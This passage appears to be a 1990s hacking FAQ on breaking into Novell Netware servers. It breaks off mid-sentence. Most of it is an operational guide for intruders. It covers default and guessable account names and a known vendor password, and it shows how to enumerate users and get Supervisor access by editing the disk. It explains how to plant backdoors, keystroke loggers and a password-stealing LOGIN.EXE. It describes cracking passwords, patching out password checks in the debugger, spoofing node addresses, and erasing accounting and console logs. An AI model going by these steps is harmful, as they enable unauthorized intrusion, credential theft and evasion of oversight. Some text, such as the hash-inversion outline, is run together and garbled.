try and address this at the end of the FAQ but the answer is no. No system
is completely secure.

I will include Win95/Netware info next version of the FAQ. Not enough time
to include stuff this time, so if you have stuff, send it.

S.N.

—————————————————————————
—————————————————————————

Contents

U means update from last FAQ, N means new.

—————————————————————————

Section 00

General Info

00-1. What is this “FAQ” for?
00-2. What is the origin of this FAQ and how do I add to it?
U 00-3. Is this FAQ available by anonymous FTP or WWW?

—————————————————————————

Section 01

Access to Accounts

U 01-1. What are common accounts and passwords in Novell Netware?
U 01-2. How can I figure out valid account names on Novell Netware?
01-3. What is the “secret” method to gain Supervisor access Novell used to
teach in CNE classes?
01-4. What is the cheesy way to get Supervisor access?
01-5. How do I leave a backdoor?
N 01-6. I don’t have SETPWD.NLM or a disk editor. How can I get Supe access?

—————————————————————————

Section 02

Passwords

02-1. How do I access the password file in Novell Netware?
02-2. How do I crack Novell Netware passwords?
N 02-3. What is a “brute force” password cracker?
N 02-4. What is a “dictionary” password cracker?
02-5. How do I use SETPWD.NLM?
02-6. What’s the “debug” way to disable passwords?
N 02-7. Exactly how do passwords get encrypted?

—————————————————————————

Section 03

Accounting and Account Security

03-1. What is Accounting?
03-2. How do I defeat Accounting?
03-3. What is Intruder Detection?
N 03-4. How do I check for Intruder Detection?
U 03-5. What are station/time restrictions?
03-6. How do I spoof my node or IP address?

—————————————————————————

Section 04

The Console

04-1. How do I defeat console logging?
04-2. Can I set the RCONSOLE password to work for just Supervisor?
N 04-3. How can I get around a locked MONITOR?

—————————————————————————

Section 05

File and Directory Access

05-1. How can I see hidden files and directories?
05-2. How do I defeat the execute-only flag?
05-3. How can I hide my presence after altering files?
05-4. What is a Netware-aware trojan?
05-5. What are Trustee Directory Assignments?
05-6. Are there any default Trustee Assignments that can be exploited?
05-7. What are some general ways to exploit Trustee Rights?
05-8. Can access to .NCF files help me?

—————————————————————————

Section 06

Fun with Netware 4.1

06-1. What is interesting about Netware 4.x’s licensing?
N 06-2. How can I tell if something is being Audited?
N 06-3. Where are the Login Scripts stored and can I edit them?
N 06-4. What is the rumored “backdoor” in NDS?
N 06-5. How can I remove NDS?
N 06-6. How can I remove Auditing if I lost the Audit password?
N 06-7. Does 4.x store the LOGIN password to a temporary file?
N 06-8. Everyone can make themselves equivalent to anyone including Admin.
How?
N 06-9. Can I reset an NDS password with just limited rights?
N 06-10. What is OS2NT.NLM?
N 06-11. Do you have to be Admin equivalent to reset a password?

—————————————————————————

Section 07

Miscellaneous Info on Netware

07-1. Why can’t I get through the 3.x server to another network via TCP/IP?
07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF?
07-3. How can I login without running the System Login Script?
07-4. How do I remotely reboot a Netware 3.x file server?
07-5. How can I abend a Netware server? And why?
07-6. What is Netware NFS and is it secure?
07-7. Can sniffing packets help me break in?
N 07-8. What else can sniffing get me?
07-9. How does password encryption work?
N 07-10. Are there products to help improve Netware’s security?
07-11. What is Packet Signature and how do I get around it?
N 07-12. Do any Netware utilities have holes like Unix utilities?

—————————————————————————

Section 08

Resources

U 08-1. What are some Netware FTP locations?
08-2. Can I get files without FTP?
U 08-3. What are some Netware WWW locations?
08-4. What are some Netware USENET groups?
08-5. What are some Netware mailing lists?
08-6. Where are some other Netware FAQs?
U 08-7. Where can I get the files mentioned in this FAQ?
08-8. What are some good books for Netware?

—————————————————————————

Section 09

Netware APIs

09-1. Where can I get the Netware APIs?
U 09-2. Are there alternatives to Netware’s APIs?

—————————————————————————

Section 10

For Administrators Only

U 10-1. How do I secure my server?
10-2. I’m an idiot. Exactly how do hackers get in?
N 10-3. I have xxx setup and xxx version running. Am I secure?

—————————————————————————
—————————————————————————

Section 00

General Info

—————————————————————————

00-1. What is this “FAQ” for?

This FAQ contains information about hacking Novell Netware. It is intented to
show what and how regarding hacking on Netware, and by illustrating this in
explicit detail show how sys admins can improve security and prevent break-ins.
Most of the information in this FAQ was compiled and collected from various
sources freely available on the Internet. In fact, most of the information here
is OLD info for serious Netware hackers. Some of the info was collected from
these serious Netware hackers, and still more was collected from “tiger team”
security sweeps that I have been involved in.

You will also find hints and generally good ideas for improving and/or expanding
an existing system. This FAQ is a good reference for sys admins as well as
hackers.

—————————————————————————

00-2. What is the origin of this FAQ and how do I add to it?

Send comments about info in this FAQ to thegnome@fastlane.net. Simple flames
about typos, the “that’s not right” one liners will be ignored. If you wish to
contribute corrections please include your research and source of facts. Also
if you wish to add your information, I will include it if I can include your
email address, unless I can verify the info independently. This way if someone
has questions, they can bug you, not me.

—————————————————————————

00-3. Is this FAQ available by anonymous FTP or WWW?

Look for it in the following locations:

jumper.mcc.ac.uk /pub/security/netware faq.zip
ftp.fastlane.net /pub/nomad/nw faq.zip
ftp.best.com /pub/almcepud/hacks faq.zip

ftp://infonexus.com/pub/Philes/FAQS/netwareHack.faq.txt.gz
http://resudox.net/bio/mainpage.html in the Netware section.

Entire FAQ Online, and the reason Al has fits with his ISP ;-):

http://www.interlog.com/~apayne/nwhack.html

—————————————————————————
—————————————————————————

Section 01

Access to Accounts

—————————————————————————

01-1. What are common accounts and passwords in Novell Netware?

Out of the box Novell Netware has the following default accounts –
SUPERVISOR, GUEST, and Netware 4.x has ADMIN and USER_TEMPLATE as well. All
of these have no password to start with. Virtually every installer quickly
gives SUPERVISOR and ADMIN a password. However, many locations will create
special purpose accounts that have easy-to-guess names, some with no
passwords. Here are a few and their typical purposes:

Account Purpose
———- ——————————————————
PRINT Attaching to a second server for printing
LASER Attaching to a second server for printing
HPLASER Attaching to a second server for printing
PRINTER Attaching to a second server for printing
LASERWRITER Attaching to a second server for printing
POST Attaching to a second server for email
MAIL Attaching to a second server for email
GATEWAY Attaching a gateway machine to the server
GATE Attaching a gateway machine to the server
ROUTER Attaching an email router to the server
BACKUP May have password/station restrictions (see below), used
for backing up the server to a tape unit attached to a
workstation. For complete backups, Supervisor equivalence
is required.
WANGTEK See BACKUP
FAX Attaching a dedicated fax modem unit to the network
FAXUSER Attaching a dedicated fax modem unit to the network
FAXWORKS Attaching a dedicated fax modem unit to the network
TEST A test user account for temp use
ARCHIVIST Palidrome default account for backup
CHEY_ARCHSVR An account for Arcserve to login to the server from
from the console for tape backup. Version 5.01g’s
password was WONDERLAND. Delete the Station
Restrictions and use SUPER.EXE to toggle this
account and you have an excellent backdoor.
WINDOWS_PASSTHRU Although not required, per the Microsoft Win95
Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
need this for resource sharing without a password.

This should give you an idea of accounts to try if you have access to a
machine that attaches to the server. A way to “hide” yourself is to give
GUEST or USER_TEMPLATE a password. Occassionally admins will check up on
GUEST, but most forget about USER_TEMPLATE. In fact, _I_ forgot about
USER_TEMPLATE until itsme reminded me.

—————————————————————————

01-2. How can I figure out valid account names on Novell Netware?

Any limited account should have enough access to allow you to run SYSCON,
located in the SYS:PUBLIC directory. If you get in, type SYSCON and enter.
Now go to User Information and you will see a list of all defined accounts.
You will not get much info with a limited account, but you can get the
account and the user’s full name.

If your in with any valid account, you can run USERLST.EXE and get a list
of all valid account names on the server.

If you don’t have access (maybe the sys admin deleted the GUEST account,
a fairly common practice), you can’t just try any account name at the LOGIN
prompt. It will ask you for a password whether the account name is valid or
not, and if it is valid and you guees the wrong password, you could be
letting the world know what you’re up to if Intruder Detection is on. But
there is a way to determine if an account is valid.

From a DOS prompt use a local copy (on your handy floppy you carry
everywhere) of MAP.EXE. After you’ve loaded the Netware TSRs up through
NETX or VLM, Try to map a drive using the server name and volume SYS:.
For example:

MAP G:=TARGET_SERVER/SYS:APPS

Since you are not logged in, you will be prompted for a login ID. If it
is a valid ID, you will be prompted for a password. If not, you will
immediately receive an error. Of course, if there is no password for the
ID you use you will be attached and mapped to the server. You can do the
same thing with ATTACH.EXE:

ATTACH TARGET_SERVER/loginidtotry

The same thing will happen as the MAP command. If valid, you will be
prompted for a password. If not, you get an error.

Another program to check for valid users and the presence of a password is
CHKNULL.EXE by itsme. This program checks for users and whether they have
a password assigned.

In 4.1 CHKNULL shows you every account with no password and you do not
have to be logged in. For this to work bindery emulation must be on. But
there is another way to get them in 4.1:

Once you load up the VLMs you may be able to view the entire tree, or at
least all of the tree you could see if logged in. Try this:

CX /T /A /R

During the installation of 4.1, [Public] has browse access to the entire
tree because [Public] is added to [Root] as a Trustee. The Inherited Rights
Filter flows this stuff down unless explicitly blocked. If you have the VLMs
loaded and access to CX, you don’t even have to log in, and you can get the
name of virtually every account on the server.

—————————————————————————

01-3. What is the “secret” method to gain Supervisor access Novell used to teach
in CNE classes?

Before I start this section, let me recommend another solution, my God, ANY
other solution is better than this! If you are running 3.x, jump to the end of
this section.

The secret method is the method of using a DOS-based sector editor to edit the
entry in the FAT, and reset the bindery to default upon server reboot. This gives
you Supervisor and Guest with no passwords. The method was taught in case you
lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts
created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed.

While you get a variety of answers from Novell about this technique, from it
doesn’t work to it is technically impossible, truth be it it can be done. Here
are the steps, as quoted from comp.os.netware.security, with my comments in
[brackets]:

[start of quote]
A Netware Server is supposed to be a very safe place to keep your files. Only
people with the right password will have access to the data stored there. The
Supervisor (or Admin) user’s password is usually the most well kept secret in
the company, since anyone that has that code could simply log to the server and
do anything he/she wants.

But what happens if this password is lost and there’s no user that is
security-equivalent to the supervisor? [Use SETPWD.NLM, instead of this process,
see section 02-3 – S.N.] What happens if the password system is somehow damaged
and no one can log to the network? According to the manual, there’s simply no
way out. You would have to reinstall the server and try to find your most recent
backup.

Fortunately, there is a very interesting way to gain complete access to a Netware
server without knowing the Supervisor’s (or Admin’s) password. You may imagine
that you would have to learn complex decryption techniques or even type in a long
C program, but that’s not the case. The trick is so simple and generic that it
will work the same way for Netware 2.x, 3.x and 4.x.

The idea is to fool Netware to think that you have just installed the server and
that no security system has been estabilished yet. Just after a Netware 2.x or
3.x server is installed, the Supervisor’s password is null and you can log in
with no restriction. Netware 4.x works slightly differently, but it also allows
anyone to log in after the initial installation, since the installer is asked to
enter a password for the Admin user.

But how can you make the server think it has just been installed without
actually reinstalling the server and losing all data on the disk? Simple. You
just delete the files that contain the security system. In Netware 2.x, all
security information is stored in two files (NET$BIND.SYS and NET$BVAL.SYS).
Netware 3.x stores that information in three files (NET$OBJ.SYS, NET$VAL.SYS and
NET$PROP.SYS). The all new Netware 4.x system stores all login names and
passwords in five different files (PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS
and UNINSTAL.NDS [This last file may not be there, don’t worry – S.N.]).

One last question remains. How can we delete these files if we don’t have access
to the network, anyway? The answer is, again, simple. Altough the people from
Novell did a very good job encrypting passwords, they let all directory
information easy to find and change if you can access the server’s disk directly,
using common utilities like Norton’s Disk Edit. Using this utility as an example,
I’ll give a step-by-step procedure to make these files vanish. All you need is a
bootable DOS disk, Norton Utilities’ Emergency Disk containing the DiskEdit
program and some time near the server.

1. Boot the server and go to the DOS prompt. To do this, just let the network
boot normally and then use the DOWN and EXIT commands. This procedure does not
work on old Netware 2.x servers and in some installations where DOS has been
removed from memory. In those cases, you’ll have to use a DOS bootable disk.

2. Run Norton’s DiskEdit utility from drive A:

3. Select “Tools” in the main menu and then select “Configuration”. At the
configuration window, uncheck the “Read-Only” checkbox. And be very careful with
everything you type after this point.

4. Select “Object” and then “Drive”. At the window, select the C: drive and make
sure you check the button “physical drive”. After that, you’ll be looking at your
physical disk and you be able to see (and change) everything on it.

5. Select “Tools” and then “Find”. Here, you’ll enter the name of the file you
are trying to find. Use “NET$BIND” for Netware 2, “NET$PROP.SYS” for Netware 3 and “PARTITIO.NDS” for Netware 4. It is possible that you find these strings in a
place that is not the Netware directory. If the file names are not all near each
other and proportionaly separated by some unreadable codes (at least 32 bytes
between them), then you it’s not the place we are looking for. In that case,
you’ll have to keep searching by selecting “Tools” and then “Find again”. [In
Netware 3.x, you can change all occurences of the bindery files and it should
still work okay, I’ve done it before. – S.N.]

6. You found the directory and you are ready to change it. Instead of deleting
the files, you’ll be renaming them. This will avoid problems with the directory
structure (like lost FAT chains). Just type “OLD” over the existing “SYS” or
“NDS” extension. Be extremely careful and don’t change anything else.

7. Select “Tools” and then “Find again”. Since Netware store the directory
information in two different places, you have to find the other copy and change
it the same way. This will again prevent directory structure problems.

8. Exit Norton Disk Edit and boot the server again. If you’re running Netware 2
or 3, your server would be already accessible. Just go to any station and log in
as user Supervisor. No password will be asked. If you’re running Netware 4, there
is one last step.

9. Load Netware 4 install utility (just type LOAD INSTALL at the console prompt)
and select the options to install the Directory Services. You be prompted for the
Admin password while doing this. After that, you may go to any station and log in
as user Admin, using the password that you have selected.

What I did with Norton’s Disk Edit could be done with any disk editing utility
with a “Search” feature. This trick has helped me save many network supervisors
in the last years. I would just like to remind you that no one should break into
a netware server unless authorized to do it by the company that owns the server.
But you problably know that already.
[end of quote]

I actually had this typed up but kept changing it, so I stole this quote from
the newsgroup to save me retyping 😉

Now the quicky for 3.x users. Use LASTHOPE.NLM, which renames the bindery and
downs the server. Reboot and you have Supe and Guest, no password.

—————————————————————————

01-4. What is the cheesy way to get Supervisor access?

The cheesy way is the way that will get you in, but it will be obvious to the
server’s admin that the server has been compromised. This technique works for
3.11.

Using NW-HACK.EXE, if the Supervisor is logged in NW-HACK does the following
things. 1) The Supervisor password is changed to SUPER_HACKER, 2) every account
on the server is made a supe equivalent, and 3) the sys admin is going to know
very quickly something is wrong. What the admin will do is remove the supe rights
from all accounts that are not supposed to have it and change the Supervisor
password back. The only thing you can do is leave a backdoor for yourself (see
next question).

—————————————————————————

01-5. How do I leave a backdoor?

Once you are in, you want to leave a way back with supe equivalency. You can use
SUPER.EXE, written for the express purpose of allowing the non-supe user to
toggle on and off supe equivalency. If you use the cheesy way in (previous
question), you turn on the toggle before the admin removes your supe
equivalency. If you gain access to a supe equivalent account, give Guest supe
equivalency and then login as Guest and toggle it on. Now get back in as the
original supe account and remove the supe equivalency. Now Guest can toggle on
supe equivalency whenever it’s convenient.

Of course Guest doesn’t have to be used, it could be another account, like an
account used for e-mail administration or an e-mail router, a gateway’s account,
you get the idea.

Now SUPER.EXE is not completely clean. Running the Security utility or Bindfix
will give away that an account has been altered at the bindery level, but the
only way for an admin to clear the error is to delete and rebuild the account.

Another backdoor is outlined in section 02-2 regarding the replacement LOGIN.EXE
and PROP.EXE

—————————————————————————

01-6. I don’t have SETPWD.NLM or a disk editor. How can I get Supe access?

If you have two volumes or some unallocated disk space you can use this
hack to get Supe. Of course you need physical access but it works. I got
this from a post in comp.os.security.netware

– Dismount all volumes
– Rename SYS: to SYSOLD:
– Rename VOL1: (or what ever) to SYS: or create new SYS: on new disk
– Reboot server
– Mount SYS: and SYSOLD:
– Attach to server as Supervisor (Note: login not available)
– Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD
– Dismount volumes
– Rename volume back to correct names
– Reboot server
– Login as Supervisor, no password due to new bindery
– Run BINDREST
– You are currently logged in as Supe, you can create a new user as
Supe equiv and use this new user to reset Supe’s password, whatever.

—————————————————————————
—————————————————————————

Section 02

Passwords

—————————————————————————

02-1. How do I access the password file in Novell Netware?

Contrary to not-so-popular belief, access to the password file in Netware is
not like Unix – the password file isn’t in the open. All objects and their
properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS
database in 4.x. An example of an object might be a printer, a group, an
individual’s account etc. An example of an object’s properties might include
an account’s password or full user name, or a group’s member list or full
name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden
and System, and these files are located on the SYS: volume in the SYSTEM
subdirectory. Their names are as follows:

Netware version File Names
————— ———-
2.x NET$BIND.SYS, NET$BVAL.SYS
3.x NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS

The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located
in 2.x and 3.x respectively.

In Netware 4.x, the files are physically located in a different location than
on the SYS: volume. However, by using the RCONSOLE utility and using the
Scan Directory option, you can see the files in SYS:_NETWARE:

File What it is
————– ————————–
VALUE.NDS Part of NDS
BLOCK.NDS Part of NDS
ENTRY.NDS Part of NDS
PARTITIO.NDS Type of NDS partition (replica, master, etc.)
MLS.000 License
VALLINCEN.DAT License validation

Here is another way to view these files, and potentially edit them. After
installing NW4 on a NW3 volume, reboot the server with a 3.x SERVER.EXE. On
volume SYS will be the _NETWARE directory. SYS:_NETWARE is hidden better on
4.1 than 4.0x, but in 4.1 you can still see the files by scanning directory
entry numbers using NCP calls (you need the APIs for this) using function
0x17 subfunction 0xF3.

—————————————————————————

02-2. How do I crack Novell Netware passwords?

There are a few ways to approach this. First, we’ll assume Intruder Detection
is turned off. We’ll also assume unencrypted passwords are allowed. Hopefully
you won’t have to deal with packet signature (see 07-11) Then we’ll assume you
have access to the console. Finally we’ll assume you can plant some kind of
password catcher. Access to a sniffer might help. These are a lot of ifs.

If Intruder Detection is off, you can use a “brute force” password cracker.
See section 02-4 for details.

Encrypted passwords is Novell’s way of protecting passwords from sniffers.
Since older versions of Netware (2.15c) sent passwords as plain text over the
wire, a sniffer could see the password as it went by. To secure things,
Novell gave the administrator a way to control this. Later versions of the
LOGIN.EXE program would encrypt the password before transmitting it across
the wire to the server. But before this could happen, the shell (NETX) had
to be updated. Since some locations had to have older shells and older
versions of LOGIN.EXE to support older equipment, the administrator has the
option of allowing unencrypted passwords to access the server. This is done
by typing SET ALLOW UNENCRYPTED PASSWORDS=ON at the console or by adding it
to the AUTOEXEC.NCF. The default is OFF, which means NOVELBFH could be beeping
the server console every attempt! Fortunately most sites turn this switch on to
support some old device.

If you have access to the console, either by standing in front of it or by
RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset passwords.
Just load the NLM and pass it command line parameters:

NLM Account(s) reset Netware version(s) supported
———— —————– —————————-
SETSPASS.NLM SUPERVISOR 3.x
SETSPWD.NLM SUPERVISOR 3.x, 4.x
SETPWD.NLM any valid account 3.x, 4.x

See 02-5 for more SETPWD.NLM info.

If you can plant a password catcher or keystroke reader, you can get them
this way. The LOGIN.EXE file is located in the SYS:LOGIN directory, and
normally you will not have access to put a file in that directory. The best
place to put a keystroke capture program is in the workstation’s path, with
the ATTRIB set as hidden. The advantage is that you’ll get the password and
Netware won’t know you swiped it. The disadvantage is getting access to the
machine to do this. The very best place to put one of these capture programs
is on a common machine, like a pcAnywhere box, which is used for remote access.
Many locations will allow pcAnywhere access to a machine with virtually no
software on it, and control security access to the LAN by using Netware’s
security features. Uploading a keystroke capture program to a machine like
this defeats this.

If the system is being backed up via a workstation, this can be used as a
good entry point. These workstations have to have supe equiv to back up the
bindery and other system files. If you can access this workstation or use
the backup systems user account name then you can get supe level login.

itsme, the notorious Netherlands Netware hacker, developed KNOCK.EXE by
rewriting one byte of ATTACH.EXE to try without a password to get into a
server. KNOCK.EXE utilitzes a bug that allows a non-password attach to get
in. This works on versions of Netware earlier than 2.2, and 3.11. Later
versions have the bug fixed. Given enough time you will get in.

Another alternative is the replacement LOGIN.EXE by itsme. This jewel,
coupled with PROP.EXE, will create a separate property in the bindery on a
2.x or 3.x server that contains the passwords. Here is the steps to use
these powerful tools:

– Gain access to a workstation logged in as Supervisor or equivalent (or
use another technique described elsewhere for getting this type of access)

– Run the PROP.EXE file with a -C option. This creates the new property for
each bindery object. Remember, you must be a Supe for this step.

– Replace the LOGIN.EXE in the SYS:LOGIN directory with itsme’s. Be sure
to flag it SRO once replaced.

– Now it is set. Keep PROP.EXE on a floppy, and check the server with any
valid login, Supervisor or not, after a week or two.

– To check the passwords captured, type PROP -R after your logged in. You
can redirect it to a file or printer. A list of accounts and passwords,
valid and working, are yours.

– Don’t forget to hide your presence! See section 05-3 for details.

—————————————————————————

02-3. What is a “brute force” password cracker?

If Intruder Detection is off, you can just guess the password until you get
it. This can be automated by using a program that continually guesses
passwords, known as a “brute force” password cracker. One program that does
this is NOVELBFH.EXE (for version 3.x only). This program will try passwords
like aa, ab, ac and so on until every legal character combination has been
tried. You will eventually get the password. However this assumes you have
1) a lot of time since it takes a second or two for each try (more on a
dial-up link), and 2) access to a machine that will run one of these programs
for hours, even days. And if Intruder Detection is on you will be beeping the
System Console every couple of seconds and time-stamping your node address to
the File Server Error Log.

—————————————————————————

02-4. What is a “dictionary” password cracker?

For a password cracker that works against a single account and uses a
dictionary wordlist, try NWPCRACK.EXE by Teiwaz. You must supply a dictionary
wordlist (see the alt.2600/#hack FAQ for FTP sites with wordlists), and you
are subject to the same limitations as NOVELBFH (no Intruder Detection, 3.x
only) but it works great.

For a password cracker that works directly against either the .OLD bindery
files left over after a BINDFIX or even a live bindery, look for BINDERY.ZIP.
This ZIP contains BINDERY.EXE which will, among other things, extract user
information out of bindery files into a Unix-style password text file. Then
you can use BINCRACK.EXE from the same ZIP to “crack” the extracted text
file. BINCRACK.EXE, like NWPCRACK.EXE, requires a word list. BINCRACK.EXE is
extremely fast.

One interesting thing, the BINDERY.ZIP file also contains versions of
BINCRACK for Solaris 1 and Solaris 2, so you can copy that extracted user
info to a Sparc and do lightning-quick cracks.

For checking existing passwords for guessability, see section 07-9.

—————————————————————————

02-5. How do I use SETPWD.NLM?

You can load SETPWD at the console or via RCONSOLE. If you use RCONSOLE, use
the Transfer Files To Server option and put the file in SYS:SYSTEM.

For 3.x:
LOAD [path if not in SYS:SYSTEM]SETPWD [username] [newpassword]

For 4.x:
set bindery context = [context, e.g. hack.corp.us]
LOAD [path if not in SYS:SYSTEM]SETPWD [username] [newpassword]

In 4.x the change is replicated so you have access to all the other servers
in the tree. And don’t forget, you must follow the password requirements in
SYSCON for this to work. That is, if the account you are changing normally
requires a 6 character password, then you’ll need to supply a 6 character
password.

—————————————————————————

02-6. What’s the “debug” way to disable passwords?

You must be at the console to do this:

Enters Debugger
type “d VerifyPassword 6” Write down 6 byte response for later use
type “c Verifypassword=B8 0 0 0 0 C3” Sets system to turn off pword checks
type “g” To make the system change and drop you back into the console

to turn password checking back on…

Enters Debugger
type “c VerifyPassword= xx xx xx xx xx xx” Where xx’s are the previous
recorded numbers that where written down.
type “g” To make system changes and drop you back to into the console

Teiwaz updated these steps to make things easier and workable.

—————————————————————————

02-7. Exactly how do passwords get encrypted?

The algorithm for 3.x and 4.x is, according to some sources, the same. It is
a proprietary algorithm that is supposed to be one-way.

The following is a description of the source code located at the
dutiws.twi.tudelft.nl site in the /pub/novell directory. The code was posted
by Fauzan Mirza on sci.crypt for discussion, and produced the following
bit-by-bit description in comp.os.netware.security by David Wagner (I’ve
removed most of the flame comments):

encryptp(int id[4], char password[])
char buffer[32];

concatenate password[] to itself until its at least 32 bytes long
put the result in buffer[]
concatenate id[] to itself until its at least 32 bytes long
xor the result into buffer[]

return encrypt(buffer[])

encrypt(char buf[32])
nibble output[32]; /* a nibble = 4 bits = half a byte */

apply some complicated (but easily reversible!) function to buf[]
for (i=0; i<32; i++) output[i] = S-box[buf[i]]; return output[] /* a 16 byte return value */ where the S-box[] crunches 8 bit values down to 4 bit values. So here's how to invert the password hash function, given the 16 byte hash output[] value: for (i=0; i<32; i++) pick any x such that S-box[x] == output[i] /* this is easy */ buf[i] = x apply the reverse of the complicated function to buf[] concatenate id[] to itself..., and xor the result into buf[] use the resulting 32 byte buf[] as the inverse password Of course, there are several nitpicking details which I've left out: if you're actually writing the inversion program, you have to make sure to take care of the details, but they only make the programming more complicated, they don't make the inversion process any slower once the program is written. Also, there is the fact that the inverse password will include full 8-bit values, not just ASCII alphanumerics. Once could try to be a bit more sophisticated to ensure you get an inverse which is alphanumeric. I haven't bothered to think about this case too much -- it doesn't seem to be worth the neurotransmitters. The reason you don't get the "true" "original" password is because when you pick 'x' above, you can't know which 'x' was the "true" "original" value, since the S-boxes throw away information. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 03 Accounting and Account Security --------------------------------------------------------------------------- 03-1. What is Accounting? Accounting is Novell's pain in the butt way to control and manage access to the server in a way that is "accountable". The admin set up charge rates for blocks read and written, service requests, connect time, and disk storage. The account "pays" for the service by being given some number, and the accounting server deduces for these items. How the account actually pays for these items (departmental billing, cash, whatever) you may or may not want to know about, but the fact that it could be installed could leave a footprint that you've been there. Any valid account, including non-supe accounts, can check to see if Accounting is turned on. Simply run SYSCON and try to access Accounting, if you get a message that Accounting is not installed, then guess what? Since it is a pain to administer, many sys admins will turn it on simply to time-stamp each login and logout, track intruders, and include the node address and account name of each of these items. --------------------------------------------------------------------------- 03-2. How do I defeat Accounting? Turn it off. And spoof your node address. Here's the steps - - Spoof your address (see 03-6). Use a supe account's typical node address as your own. - If you are using a backdoor, activate it with SUPER.EXE. - Delete Accounting by running SYSCON, selecting Accounting, Accounting Servers, hitting the delete key, and answering yes when asked if you wish to delete accounting. The last entry in the NET$ACCT.DAT file will be your login time-stamped with the spoofed node address. - Now do what you will in the system. Use a different account if you like, it won't show up in the log file. - When done, login with the original account, run SYSCON and re-install Accounting. Immediately logout, and the next line in the NET$ACCT.DAT file will be your logout, showing a login and logout with the same account name, nice and neat. If you can't spoof the address (some LAN cards don't allow it or require extra drivers you may not have), just turn off Accounting and leave it off or delete the NET$ACCT.DAT file located in the SYS:SYSTEM directory. It should be noted that to turn off and on Accounting you need supe equivalent, but you don't need supe equivalence to spoof the address. --------------------------------------------------------------------------- 03-3. What is Intruder Detection? Intruder Detection is Novell's way of tracking invalid password attempts. While this feature is turned off by default, most sites practicing any type of security will at minimum turn this feature on. There are several parameters to Intruder Detection. First, there is a setting for how long the server will remember a bad password attempt. Typically this is set to 30 minutes, but can be as short as 10 minutes of as long as 7 days. Then there is a setting for how many attempts will lockout the account. This is usually 3 attempts, but can be as short as 1 or as many as 7. Finally is the length the account is locked out. The default is 30 minutes but it can range from 10 minutes to 7 days. When an Intruder Detection occurs, the server beeps and a time-stamped message is displayed on the System Console with the account name that is now locked out and the node address from where to attempt came from. This is also written to the File Server Error Log. A Supervisor or equivalent can unlock the account before it frees itself up, and the File Server Error Log can also be erased by a Supervisor or equivalent. In a large shop, it is not unusual to see Intruder Lockouts even on a daily basis, and forgetting a password is a typical regular-user thing to do. Intruder Lockouts on Supervisor or equivalent account is usually noticed. --------------------------------------------------------------------------- 03-4. How do I check for Intruder Detection? The easiest way to check for Intruder Detection is to play with a valid account that you know the password of. Try the wrong password several times. If Intruder Detection is on, the account will be locked out once you try to get back in with the correct password. --------------------------------------------------------------------------- 03-5. What are station/time restrictions? Time restrictions can be placed on an account to limit the times in which an account can be logged in. In the account is already logged in and the time changes to a restricted time, the account is logged out. The restriction can be per weekday down to the half hour. That means that if an admin wants to restrict an account from logging in except on Monday through Friday from 8-5, it can be done. Only Supervisor and equivalents can alter time restrictions. Altering the time at the workstation will not get you around time restrictions, only altering time at the server can change the ability to access. Station restriction place a restriction on _where_ an account can be used. Restrictions can be to a specific token ring or ethernet segment, and can be specific down to the MAC layer address, or node address. The only way around a station restriction at the node address is to spoof the address from a workstation on the same segment or ring as the address you are spoofing. Like time restrictions, only Supervisor and equivalents can alter station restrictions. Of course you can remove station and time restrictions in SYSCON if you are a Supe equivalent. --------------------------------------------------------------------------- 03-6. How do I spoof my node or IP address? This will depend greatly on what kind of network interface card (NIC) the workstation has, as to whether you can perform this function. Typically you can do it in the Link Driver section of the NET.CFG file by adding the following line - NODE ADDRESS xxxxxxxxxxxx where xxxxxxxxxxxx is the 12 digit MAC layer address. This assumes you are using Netware's ODI drivers, if you are using NDIS drivers you will have to add the line to a PROTOCOL.INI or IBMENII.NIF file, which usually has the lines already in it. For an IP address, you may have to run a TCPIP config program to make it work (it depends on whose IP stack you are running). Some implementations will have the mask, the default router and the IP address in the NET.CFG, some in the TCPIP.CFG. It is a good idea to look around in all network- related subdirectories to see if there are any .CFG, .INI, or .NIF files that may contain addresses. Getting the target node address should be pretty easy. Login with any account and do a USERLIST /A. This will list all accounts currently logged in with their network and node address. If your workstation is on the same network as the target, you can spoof the address no problem. Actually you can spoof the address regardless but to defeat station restrictions you must be on the same network. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 04 The Console --------------------------------------------------------------------------- 04-1. How do I defeat console logging? Here you need console and Supervisor access. The site is running 3.11 or higher and running the CONLOG.NLM. Any site running this is trapping all console messages to a file. If you run SETPWD at the console, the response by SETPWD is written to a log file. Here's the steps for determining if it is running and what to do to defeat it: - Type MODULES at the console. Look for the CONLOG.NLM. If it's there, it's running. - Look on the server in SYS:ETC for a file called CONSOLE.LOG. This is a plain text file that you can type out. However you cannot delete or edit it while CONLOG is running. - Unload CONLOG at the console. - Delete, or even better yet, edit the CONSOLE.LOG file, erasing your tracks. - Reload CONLOG. It will show that is has been restarted in the log. - Check the CONSOLE.LOG file to ensure the owner has not changed. - Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG that your editor have left to be salvaged. --------------------------------------------------------------------------- 04-2. Can I set the RCONSOLE password to work for just Supervisor? Yes and no. In version 3.x, the Supe password always works. A common mistake regarding 3.x RCONSOLE passwords is to use a switch to use only the Supervisor password. It works like this: LOAD REMOTE /P= instead of LOAD REMOTE RCONPASSWORD The admin believes /P= turns off everything except the Supe password for RCONSOLE. In fact the password is just set to /P= which will get you in! The second most common mistake is using -S. Version 4.1 is a bit different. Here's how it works: - At the console prompt, type LOAD REMOTE SECRET where SECRET is the Remote Console password. - Now type REMOTE ENCRYPT. You will be prompted for a password to encrypt. - This will give you the encrypted version of the password, and give you the option of writing LDREMOTE.NCF to the SYS:SYSTEM directory, containing all the entries for loading Remote Console support. - You can call LDREMOTE from your AUTOEXEC.NCF, or you can change the LOAD REMOTE line in the AUTOEXEC.NCF as follows: LOAD REMOTE SECRET becomes LOAD REMOTE -E 870B7E366363 --------------------------------------------------------------------------- 04-3. How can I get around a locked MONITOR? There is a simple and easy way to do this in 3.11 if you have a print server running on the file server. The following exploits a bug in 